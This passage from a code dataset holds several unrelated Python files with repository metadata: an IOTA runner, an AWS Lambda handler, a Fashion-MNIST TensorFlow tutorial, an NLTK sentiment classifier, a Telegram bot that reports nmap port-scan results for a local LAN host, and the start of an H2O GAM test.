seconds),\n print_tag=True,\n )\n\n\n# ============================================================================ #\ndef entry_point():\n from iota.init.iota_init import initialize_interface, initialize_new_run\n\n args, phil_args = parse_command_args().parse_known_args()\n\n if args.run_path:\n from iota.base.info import ProcInfo\n\n info = ProcInfo.from_folder(args.run_path[0])\n proc = Process.for_existing_run(info=info, out_type=args.out_type[0])\n else:\n if args.out_type == \"progress\":\n print(logo)\n\n if not args.path:\n parse_command_args().print_help() # Print usage\n if args.default: # Write out default params and exit\n from iota.init.iota_input import print_params\n\n help_out, txt_out = print_params()\n print(\"\\n{:-^70}\\n\".format(\"IOTA Parameters\"))\n print(help_out)\n iota_exit()\n\n with prog_message(\"Interpreting input\", prog=\"UI INIT\", out_type=args.out_type):\n input_dict, phil, msg = initialize_interface(args, phil_args)\n if not (input_dict or phil):\n iota_exit(silent=(args.out_type == \"silent\"), msg=msg)\n\n with prog_message(\n \"Initializing run parameters\", prog=\"PARAM INIT\", out_type=args.out_type\n ):\n init_ok, info, msg = initialize_new_run(phil=phil, input_dict=input_dict)\n if not init_ok:\n iota_exit(silent=False, msg=msg)\n\n proc = Process.for_new_run(\n paramfile=info.paramfile, run_no=info.run_number, out_type=args.out_type\n )\n\n proc.run()\n\n\nif __name__ == \"__main__\":\n entry_point()\n", "repo_name": "ssrl-px/iota", "sub_path": "src/iota/command_line/iota_run.py", "file_name": "iota_run.py", "file_ext": "py", "file_size_in_byte": 8079, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 27, "usage_type": "attribute"}, {"api_name": "iota.help_message", "line_number": 28, "usage_type": "name"}, {"api_name": "iota.iota_version", "line_number": 41, "usage_type": "argument"}, {"api_name": "dials.util.command_line.Command.start", "line_number": 108, "usage_type": "call"}, {"api_name": "dials.util.command_line.Command", "line_number": 108, "usage_type": "attribute"}, {"api_name": "dials.util.command_line", "line_number": 108, "usage_type": "name"}, {"api_name": "dials.util.command_line.Command.end", "line_number": 116, "usage_type": "call"}, {"api_name": "dials.util.command_line.Command", "line_number": 116, "usage_type": "attribute"}, {"api_name": "dials.util.command_line", "line_number": 116, "usage_type": "name"}, {"api_name": "dials.util.command_line.Command.end", "line_number": 118, "usage_type": "call"}, {"api_name": "dials.util.command_line.Command", "line_number": 118, "usage_type": "attribute"}, {"api_name": "dials.util.command_line", "line_number": 118, "usage_type": "name"}, {"api_name": "contextlib.contextmanager", "line_number": 105, "usage_type": "name"}, {"api_name": "iota.base.processor.ProcessingBase", "line_number": 130, "usage_type": "name"}, {"api_name": "iota.base.processor.ProcessingBase.__init__", "line_number": 134, "usage_type": "call"}, {"api_name": "iota.base.processor.ProcessingBase", "line_number": 134, "usage_type": "name"}, {"api_name": "libtbx.easy_pickle.dump", "line_number": 152, "usage_type": "call"}, {"api_name": "libtbx.easy_pickle", "line_number": 152, "usage_type": "name"}, {"api_name": "time.time", "line_number": 161, "usage_type": "call"}, {"api_name": "dials.util.command_line.ProgressBar", "line_number": 171, "usage_type": "call"}, {"api_name": "dials.util.command_line", "line_number": 171, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 174, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "iota.utils.utils.main_log", "line_number": 176, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 201, "usage_type": "call"}, {"api_name": "time.time", "line_number": 201, "usage_type": "call"}, {"api_name": "iota.utils.utils.main_log", "line_number": 203, "usage_type": "call"}, {"api_name": "iota.base.info.ProcInfo.from_folder", "line_number": 220, "usage_type": "call"}, {"api_name": "iota.base.info.ProcInfo", "line_number": 220, "usage_type": "name"}, {"api_name": "iota.logo", "line_number": 224, "usage_type": "argument"}, {"api_name": "iota.init.iota_input.print_params", "line_number": 231, "usage_type": "call"}, {"api_name": "iota.utils.utils.iota_exit", "line_number": 234, "usage_type": "call"}, {"api_name": "iota.init.iota_init.initialize_interface", "line_number": 237, "usage_type": "call"}, {"api_name": "iota.utils.utils.iota_exit", "line_number": 239, "usage_type": "call"}, {"api_name": "iota.init.iota_init.initialize_new_run", "line_number": 244, "usage_type": "call"}, {"api_name": "iota.utils.utils.iota_exit", "line_number": 246, "usage_type": "call"}]} +{"seq_id": "40824369572", "text": "import os\nimport datetime\nimport json\nimport sys\nsys.path.append(\"/opt/\")\nimport boto3\n\nstepfunctions_client = boto3.client(\"stepfunctions\")\n\n\ndef lambda_handler(event, context):\n print(event)\n\n taskToken = event[\"Details\"][\"ContactData\"][\"Attributes\"][\"taskToken\"]\n message = event[\"Details\"][\"ContactData\"][\"Attributes\"]\n message[\"response_intent\"] = event[\"Details\"][\"Parameters\"][\n \"response_intent\"]\n message[\"error\"] = \"null\"\n\n if \"intent_answer\" in message and message[\"intent_answer\"] is not \"\":\n message[\"answer\"] = message[\"intent_answer\"]\n answer = message[\"intent_answer\"]\n else:\n answer = message[\"response_intent\"].replace(\"CalloutBot_\",\n \"\").replace(\"Intent\", \"\")\n message[\"answer\"] = answer\n\n message[\"intent_answer\"] = \"\"\n\n previous_answer = json.loads(message[\"answers\"])\n previous_answer.append(answer)\n message[\"answers\"] = json.dumps(previous_answer)\n\n return message\n", "repo_name": "wongcyrus/callouts", "sub_path": "call_out/response_handler.py", "file_name": "response_handler.py", "file_ext": "py", "file_size_in_byte": 1011, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "boto3.client", "line_number": 8, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 30, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "9696531608", "text": "\"\"\"project3.\"\"\"\r\nimport logging\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport math\r\nimport tensorflow as tf\r\n\r\n# Import TensorFlow Datasets\r\nimport tensorflow_datasets as tfds\r\n\r\ntfds.disable_progress_bar()\r\nlogger = tf.get_logger()\r\nlogger.setLevel(logging.ERROR)\r\n\r\n# loading daata\r\ndataset, metadata = tfds.load('fashion_mnist', as_supervised=True,\r\n with_info=True)\r\n# naming data, thoough I wonder why?\r\ntrain_dataset = dataset['train']\r\ntest_dataset = dataset['test']\r\n\r\n\"\"\"\r\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\r\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\r\n\"\"\"\r\nclass_names = metadata.features['label'].names\r\n# 60,000 images to train the network and 10,000 images to evaluate\r\nprint(\"Class names: {}\".format(class_names))\r\n\r\nnum_train_examples = metadata.splits['train'].num_examples\r\nnum_test_examples = metadata.splits['test'].num_examples\r\nprint(\"Number of training examples: {}\".format(num_train_examples))\r\nprint(\"Number of test examples: {}\".format(num_test_examples))\r\n\r\n# The value of each pixel in the image data is an integer in the range [0,255].\r\n# For the model to work properly, these values need to be normalized\r\n# to the range [0,1]\r\n\r\n\r\ndef normalize(images, labels):\r\n \"\"\"Normalises a pixel value from 0-255 to 0-1.\"\"\"\r\n images = tf.cast(images, tf.float32)\r\n images /= 255\r\n return images, labels\r\n\r\n\r\n# The map function applies the normalize function to each element in the train\r\n# and test datasets\r\ntrain_dataset = train_dataset.map(normalize)\r\ntest_dataset = test_dataset.map(normalize)\r\n\r\n# The first time you use the dataset, the images will be loaded from disk\r\n# Caching will keep them in memory, making training faster\r\ntrain_dataset = train_dataset.cache()\r\ntest_dataset = test_dataset.cache()\r\n\r\n# Take first 30 images with test_dataset.take(30)\r\n# A crude way of printing imeages 5-30\r\nplt.figure(figsize=(10, 10))\r\ni = 0\r\ninitial = 5 # initial image to plot\r\nfor (image, label) in test_dataset.take(30):\r\n if i >= initial:\r\n image = image.numpy().reshape((28, 28))\r\n plt.subplot(5, 5, i-initial+1)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.grid(False)\r\n plt.imshow(image, cmap=plt.cm.binary)\r\n plt.xlabel(class_names[label])\r\n i += 1\r\nplt.show()\r\n\r\n# General info about lists in Python\r\n\"\"\"\r\nL[a], L[b] = L[b], L[a] if shifting is needed\r\nmore information about shifting objects in lists via the link:\r\nhttps://coderoad.ru/39167057/%D0%9B%D1%83%D1%87%D1%88%D0%B8%D0\r\n%B9-%D1%81%D0%BF%D0%BE%D1%81%D0%BE%D0%B1-%D0%BF%D0%BE%D0%BC%D0\r\n%B5%D0%BD%D1%8F%D1%82%D1%8C-%D0%BC%D0%B5%D1%81%D1%82%D0%B0%D0%\r\nBC%D0%B8-%D1%8D%D0%BB%D0%B5%D0%BC%D0%B5%D0%BD%D1%82%D1%8B-%D0%\r\nB2-%D1%81%D0%BF%D0%B8%D1%81%D0%BA%D0%B5 \"\"\"\r\n# Creatung a model-layers part\r\n\"\"\" Creating the list of layers, starting with layer 0.\r\nTHE ORDER DOES METTER!!!\r\nAdding new layers in the end of existing list \"\"\"\r\n\r\nlayers = [tf.keras.layers.Conv2D(filters=32, kernel_size=(3, 3),\r\n padding='same', activation=tf.nn.relu,\r\n input_shape=(28, 28, 1))]\r\n# this layer creates 32 convoluted images 28x28 pixels: 1 image for each filter\r\n# (overall 28*28*32=25088 nodes)\r\n# obtained by applying 3x3 filter --> the values in the filter are changing during training\r\n# so to minimize the loss function\r\n# more info: https://www.tensorflow.org/api_docs/python/tf/keras/layers/Conv2D\r\n\r\nlayers.append(tf.keras.layers.MaxPooling2D(pool_size=(2, 2),\r\n strides=2))\r\n# MaxPoolimng = reducing the size of the image; applying 2x2 frame\r\n# Taking the maximum value from the frame and put it into the new image\r\n# shifting the frame by 2 (strides = n means strides = (n, n));\r\n# overall 28/2*28/2*32=25088/4=6272 nodes in 32 batches\r\n\r\nlayers.append(tf.keras.layers.Conv2D(64, (3, 3), padding='same',\r\n activation=tf.nn.relu))\r\n# the same as 1st, but now it is 14*14*64=12544 nodes in 64 batches\r\n\r\nlayers.append(tf.keras.layers.MaxPooling2D((2, 2), strides=2))\r\n# the same as 2nd, 14/2*14/2*64=3136 nodes; 7*7 nodes in 64 batches\r\n\r\nlayers.append(tf.keras.layers.Flatten())\r\n# flattens the last layer\r\n\r\nlayers.append(tf.keras.layers.Dense(128, activation=tf.nn.relu))\r\n# add the layer with 128 nodes operating by relu rule\r\nlayers.append(tf.keras.layers.Dense(10, activation=tf.nn.softmax))\r\n\r\n# the list of layers above is the argument in Sequential\r\nmodel = tf.keras.Sequential(layers)\r\n\r\n# Compilation of the model\r\nmodel.compile(optimizer='adam',\r\n loss=tf.keras.losses.SparseCategoricalCrossentropy(),\r\n metrics=['accuracy'])\r\n\r\nBATCH_SIZE = 32\r\n# .batch(BATCH_SIZE) tells model.fit to use batches of BATCH_SIZE\r\n# images and labels when updating the model variables\r\n# .shuffle(num_train_examples) randomizes the order of train_examples\r\n# .repeat() makes it to repeat forever, until the number of epochs is reached\r\n# .cash uploads dataset into cache\r\n# the order of .functions applied to the dataset object seams\r\n# does not matter, except should end by cache().repeat() or .cache()\r\ntrain_dataset = train_dataset.shuffle(num_train_examples).batch(\r\n BATCH_SIZE).cache().repeat()\r\ntest_dataset = test_dataset.batch(BATCH_SIZE).cache()\r\n\r\n# TRAINING THE MODEL\r\n# epoch - the numder of uses of the whole dataset\r\n# steps_per_epoch - the number of changes of batches (must be integer)\r\nmodel.fit(train_dataset, epochs=10,\r\n steps_per_epoch=math.ceil(num_train_examples/BATCH_SIZE))\r\n\r\n# EVALUATION OF THE MODEL\r\ntest_loss, test_accuracy = model.evaluate(test_dataset, steps=math.\r\n ceil(num_test_examples/32))\r\nprint('Accuracy on test dataset:', test_accuracy)\r\n\r\nnumber_of_batch = 1 # the number of batch we take, starting with 1\r\nfor test_images, test_labels in test_dataset.take(number_of_batch):\r\n test_images = test_images.numpy() # .numpy() converts a Tensor\r\n test_labels = test_labels.numpy() # to a Numpy array, so images and\r\n predictions = model.predict(x=test_images, batch_size=BATCH_SIZE)\r\n# labels are arrays now\r\n# it seems no necessary, because model.predict can work with tensors\r\n# but maybe it is used later somewhere\r\n# model.predict returns the numpy array of predictions\r\n\r\nprint(predictions.shape) # printing tuple of array dimensions (tuple==cortege)\r\n# should be 32x10, 32 = batch size times 10 predictions for each image\r\n\r\nprint(predictions[2]) # p-ing the distribution of predictions' probabilities\r\n# for image number 2 in batch number 1\r\n\r\nprint(np.argmax(predictions[2])) # printing the number of the array\r\n# with the maximum value among the predictions\r\nprint(test_labels[2]) # the same for labels\r\nprint(class_names[test_labels[2]]) # printing the name of the label\r\n\r\n\r\ndef plot_image(i, predictions_array, true_labels, images):\r\n \"\"\"Plotes the image.\"\"\"\r\n predictions_array, true_label, img = predictions_array[i], true_labels[i], images[i]\r\n plt.grid(False)\r\n plt.xticks([])\r\n plt.yticks([])\r\n plt.imshow(img[..., 0], cmap=plt.cm.binary)\r\n predicted_label = np.argmax(predictions_array)\r\n if predicted_label == true_label:\r\n color = 'blue'\r\n else:\r\n color = 'red'\r\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\r\n 100*np.max(predictions_array),\r\n class_names[true_label]),\r\n color=color)\r\n\r\n\r\ndef plot_value_array(i, predictions_array, true_label):\r\n \"\"\"Plotes the probability bar chart.\"\"\"\r\n predictions_array, true_label = predictions_array[i], true_label[i]\r\n plt.grid(False)\r\n plt.xticks([])\r\n plt.yticks([])\r\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\r\n plt.ylim([0, 1])\r\n predicted_label = np.argmax(predictions_array)\r\n thisplot[predicted_label].set_color('red')\r\n thisplot[true_label].set_color('blue')\r\n\r\n\r\n# drawing 0th image:\r\ni = 0\r\nplt.figure(figsize=(6, 3))\r\nplt.subplot(1, 2, 1)\r\nplot_image(i, predictions, test_labels, test_images)\r\nplt.subplot(1, 2, 2)\r\nplot_value_array(i, predictions, test_labels)\r\n\r\n# drawing 12th image:\r\ni = 12\r\nplt.figure(figsize=(6, 3))\r\nplt.subplot(1, 2, 1)\r\nplot_image(i, predictions, test_labels, test_images)\r\nplt.subplot(1, 2, 2)\r\nplot_value_array(i, predictions, test_labels)\r\n\r\n# Plot the X test images after the shift, their predicted label,\r\n# and the true label\r\n# Color correct predictions in blue, incorrect predictions in red\r\nnum_rows = 5\r\nnum_cols = 3\r\nnum_images = num_rows*num_cols\r\nplt.figure(figsize=(2*2*num_cols, 2*num_rows))\r\nshift = 15 # to arrange the shift in image display\r\nfor i in range(num_images):\r\n plt.subplot(num_rows, 2*num_cols, 2*i+1)\r\n plot_image(shift+i, predictions, test_labels, test_images)\r\n plt.subplot(num_rows, 2*num_cols, 2*i+2)\r\n plot_value_array(shift+i, predictions, test_labels)\r\n\r\n# Use the the trained model to make a prediction about a single img\r\n\r\n# Grab an image from the test dataset\r\nimg = test_images[0]\r\nprint(img.shape)\r\n\r\n# Add the image to a batch where it's the only member.\r\nimg = np.array([img])\r\nprint(img.shape)\r\n\r\n# Predict the image\r\n# model.predict returns a list of lists,\r\n# one for each image in the batch of data\r\npredictions_single = model.predict(img)\r\nprint(predictions_single)\r\n\r\nplot_value_array(0, predictions_single, test_labels)\r\n_ = plt.xticks(range(10), class_names, rotation=45)\r\nprint(np.argmax(predictions_single[0]))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n", "repo_name": "YuriiNev/TF_studying", "sub_path": "project3_main.py", "file_name": "project3_main.py", "file_ext": "py", "file_size_in_byte": 9647, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tensorflow_datasets.disable_progress_bar", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.get_logger", "line_number": 12, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow_datasets.load", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 42, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 69, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 70, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 97, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Conv2D", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 104, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 105, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.MaxPooling2D", "line_number": 108, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 108, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 111, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 111, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 114, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 114, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tensorflow.nn", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 119, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 123, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 142, "usage_type": "call"}, {"api_name": "math.ceil", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 175, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 176, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 176, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 177, "usage_type": "attribute"}, {"api_name": "numpy.argmax", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 215, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 215, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 249, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 250, "usage_type": "call"}]} +{"seq_id": "19649001616", "text": "'''\nimport json\n\nimport requests\n\nurl = \"http://127.0.0.1:8889/nlp_words\"\n\ndata = {\"userId\": 1, \"words\": \"我想查话费\"}\n\nresp = requests.post(url=url, data=json.dumps(data))\n\nprint(resp.text)\n'''\nimport json\nimport requests\n\nurl = \"http://127.0.0.1:8889/nlp_words\"\n\npayload = {\"userId\": 1, \"words\": \"我想查话费\"}\nheaders = {\n 'content-type': \"application/json\",\n 'cache-control': \"no-cache\",\n 'postman-token': \"4ec2dbd7-8da8-69b3-058a-8eb536557db0\"\n }\n\nresponse = requests.request(\"POST\", url, data=json.dumps(payload), headers=headers)\n\nprint(json.loads(response.text))\n\n\n", "repo_name": "aaaasule/zndhjqr", "sub_path": "test/test_middleware.py", "file_name": "test_middleware.py", "file_ext": "py", "file_size_in_byte": 594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.request", "line_number": 26, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "28409984669", "text": "import nltk\nimport numpy\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom nltk.corpus import movie_reviews\nimport random\nfrom sklearn.naive_bayes import MultinomialNB,GaussianNB,BernoulliNB\nimport pickle\n\n\ndocument=[(list(movie_reviews.words(fileid)),category)\n for category in movie_reviews.categories()\n for fileid in movie_reviews.fileids(category)]\nrandom.shuffle(document)\nall_words=[]\nfor w in movie_reviews.words():\n all_words.append(w.lower())\nall_words=nltk.FreqDist(all_words)\nword_feature=list(all_words)[:3000]\n\ndef find_feature(documents):\n words=set(documents)\n feature={}\n for w in word_feature:\n feature[w]=(w in words)\n return feature\nprint((find_feature(movie_reviews.words('neg/cv000_29416.txt'))))\nfeatures=[(find_feature(rev),category) for(rev,category) in document]\n\ntraining_Set=features[:1900]\ntest_set=features[1900:]\nclassifier=nltk.NaiveBayesClassifier.train(training_Set)\nprint(\"naive bayes accuarac\",(nltk.classify.accuracy(classifier,test_set))*100)\n", "repo_name": "sardarr/Pyhthon_NLP_Tutorial", "sub_path": "movie_reviews.py", "file_name": "movie_reviews.py", "file_ext": "py", "file_size_in_byte": 1032, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nltk.corpus.movie_reviews.words", "line_number": 10, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 10, "usage_type": "name"}, {"api_name": "nltk.corpus.movie_reviews.categories", "line_number": 11, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 11, "usage_type": "name"}, {"api_name": "nltk.corpus.movie_reviews.fileids", "line_number": 12, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 12, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 13, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews.words", "line_number": 15, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 15, "usage_type": "name"}, {"api_name": "nltk.FreqDist", "line_number": 17, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews.words", "line_number": 26, "usage_type": "call"}, {"api_name": "nltk.corpus.movie_reviews", "line_number": 26, "usage_type": "name"}, {"api_name": "nltk.NaiveBayesClassifier.train", "line_number": 31, "usage_type": "call"}, {"api_name": "nltk.NaiveBayesClassifier", "line_number": 31, "usage_type": "attribute"}, {"api_name": "nltk.classify.accuracy", "line_number": 32, "usage_type": "call"}, {"api_name": "nltk.classify", "line_number": 32, "usage_type": "attribute"}]} +{"seq_id": "958158134", "text": "# Echo\nimport nmap\nfrom telegram.ext import Updater, CommandHandler\n\nupdater = Updater(token=\"fffffffffffff\")\ndispatcher = updater.dispatcher\n\n\ndef command(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"/scanports \\n /checkstatus\")\nstart_handler = CommandHandler(\"command\", command)\ndispatcher.add_handler(start_handler)\n\n\ndef scanports(bot, update):\n nm = nmap.PortScanner()\n scan_range = nm.scan(hosts=\"192.168.0.104\")\n data = scan_range['scan']\n print(data)\n bot.send_message(chat_id=update.message.chat_id, text=data)\nscanports_handler = CommandHandler(\"scanports\", scanports)\ndispatcher.add_handler(scanports_handler)\n\n\n\ndef checkstatus(bot, update):\n nm = nmap.PortScanner()\n scan_range = nm.scan('192.168.0.104', '21-443')\n for host in nm.all_hosts():\n print('Host : %s' % (host))\n print('State : %s' % nm[host].state())\n bot.send_message(chat_id=update.message.chat_id, text='Host : 192.168.0.104' + ' => ' + nm[host].state())\ncheckstatus_handler = CommandHandler(\"checkstatus\", checkstatus)\ndispatcher.add_handler(checkstatus_handler)\n\n\nupdater.start_polling()\n\n", "repo_name": "muhammedessa/python_telegram", "sub_path": "pythonTelegram/main6.py", "file_name": "main6.py", "file_ext": "py", "file_size_in_byte": 1140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "61", "api": [{"api_name": "telegram.ext.Updater", "line_number": 5, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 11, "usage_type": "call"}, {"api_name": "nmap.PortScanner", "line_number": 16, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 21, "usage_type": "call"}, {"api_name": "nmap.PortScanner", "line_number": 27, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "13348195854", "text": "import sys\nsys.path.insert(1, \"../../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.gam import H2OGeneralizedAdditiveEstimator\nimport random\n\n# In this test, I will test all the following cross-validation parameters:\n# 1. fold_assignment = random\n# 2. keep_cross_validation_model\n# 3. keep_cross_validation_predictions\n# 4. keep_cross_validation_fold_assignment\n# \n# If we keep the cross-validation models and the fold assignment, then the prediction using the folds and\n# the predictions kept from cross-validation should yield the same result!\ndef test_gam_model_predict():\n print(\"Checking cross validation for GAM binomial\")\n print(\"Preparing for data....\")\n h2o_data = h2o.import_file(pyunit_utils.locate(\"smalldata/glm_test/binomial_20_cols_10KRows.csv\"))\n h2o_data[\"C1\"] = h2o_data[\"C1\"].asfactor()\n h2o_data[\"C2\"] = h2o_data[\"C2\"].asfactor()\n h2o_data[\"C3\"] = h2o_data[\"C3\"].asfactor()\n h2o_data[\"C4\"] = h2o_data[\"C4\"].asfactor()\n h2o_data[\"C5\"] = h2o_data[\"C5\"].asfactor()\n h2o_data[\"C6\"] = h2o_data[\"C6\"].asfactor()\n h2o_data[\"C7\"] = h2o_data[\"C7\"].asfactor()\n 